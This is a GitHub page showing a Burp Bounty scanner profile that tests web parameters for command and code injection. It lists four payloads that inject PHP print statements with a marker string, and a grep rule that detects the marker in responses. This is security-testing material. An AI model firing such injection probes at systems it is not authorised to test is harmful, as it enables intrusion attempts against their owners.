-
Notifications
You must be signed in to change notification settings - Fork 19
Expand file tree
/
Copy pathCommand_Injection.bb
More file actions
73 lines (73 loc) · 1.64 KB
/
Command_Injection.bb
File metadata and controls
73 lines (73 loc) · 1.64 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
[
{
"ProfileName": "Command_Injection",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "",
"Payloads": [
"true,print(\u0027sy3omda\u0027)",
"true,;print(\u0027sy3omda\u0027)",
"true,\u0027.print(\u0027sy3omda\u0027).\u0027",
"true,\u003c?php print(\u0027sy3omda\u0027)?\u003e"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,*sy3omda*"
],
"Tags": [
"commandinjection",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 3,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Command Injection",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "Command Injection payload: \u003cbr\u003e \u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
65,
32,
2,
35,
34,
0,
37
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
]